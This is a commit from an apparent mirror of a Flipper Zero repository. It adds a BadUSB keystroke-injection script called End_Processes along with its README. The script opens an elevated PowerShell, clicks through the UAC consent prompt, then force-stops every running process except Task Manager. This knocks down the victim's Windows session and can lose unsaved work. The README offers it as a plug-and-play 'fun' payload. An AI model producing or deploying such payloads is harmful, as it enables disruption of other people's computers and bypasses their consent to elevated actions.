mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 19:21:30 +00:00
Adding lost UNC0V3R3D BadUSB Collection
This commit is contained in:
@@ -0,0 +1,17 @@
|
||||
REM Author: UNC0V3R3D
|
||||
REM Description: Uses the taskmanager and tries to end all processes
|
||||
REM Version: 1.0
|
||||
REM Category: FUN
|
||||
DELAY 800
|
||||
GUI r
|
||||
DELAY 800
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
DELAY 800
|
||||
ENTER
|
||||
DELAY 800
|
||||
LEFTARROW
|
||||
DELAY 800
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Start-Process taskmgr.exe -WindowStyle Hidden; Get-Process | Where-Object { $_.Name -ne "taskmgr" } | Stop-Process -Force
|
||||
ENTER
|
||||
@@ -0,0 +1,32 @@
|
||||
# End_Processes
|
||||
Uses the taskmanager and tries to end all processes
|
||||
|
||||
## How to use?
|
||||
|
||||
This script is plug and play.
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- open taskmanager
|
||||
- end all processes
|
||||
|
||||
|
||||
## Feedback
|
||||
|
||||
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Support
|
||||
|
||||
For support, contact me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
## Meta
|
||||
|
||||
|
||||
- If you want to sponsor me on Patreon, the link is on my profile.
|
||||
Reference in New Issue
Block a user